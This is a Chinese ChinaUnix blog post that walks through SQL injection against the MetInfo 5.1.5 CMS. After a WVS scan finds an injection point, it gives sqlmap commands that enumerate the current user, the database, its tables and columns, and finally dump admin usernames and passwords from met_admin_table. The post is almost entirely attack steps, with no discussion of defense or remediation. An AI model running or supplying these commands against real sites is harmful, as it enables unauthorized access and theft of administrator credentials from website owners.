Chinaunix首页 | 论坛 | 博客
  • 博客访问: 375563
  • 博文数量: 73
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 2469
  • 用 户 组: 普通用户
  • 注册时间: 2013-07-16 23:51
个人简介

活泼开朗是我的特性。

文章分类
文章存档

2014年(27)

2013年(46)

分类: 数据库开发技术

2013-07-31 09:41:54

讲了Sqlmap简单注入(access数据库)教程,这次咱说说MySql数据库
MetInfo,是一款强大的企业网站管理系统,采用PHP+Mysql架构。
叉叉下载的是MetInfo 5.1.5的免费版本,咱不是大拿,不会分析源码,直接丢到WVS里面扫

发现注入点,打开我们的backtrack5,运行Sqlmap神器

获取当前用户名称,输入命令:python sqlmap.py -u –current-user

获取当前数据库名称,输入命令:python sqlmap.py -u –current-db

得到数据库名为:met

列数据库表名,输入命令:python sqlmap.py -u –tables -D “met“成功得到”met”数据库的表名如下图:

列admin表的字段,输入命令:python sqlmap.py -u –columns  -T “met_admin_table“ -D “met”

上图显示成功获取met_admin_table表的字段,下面dump出admin_name和admin_pass内容,输入命令:python sqlmap.py -u –dump -C “admin_pass,admin_name” -T “met_admin_table” -D “met”
阅读(2815) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~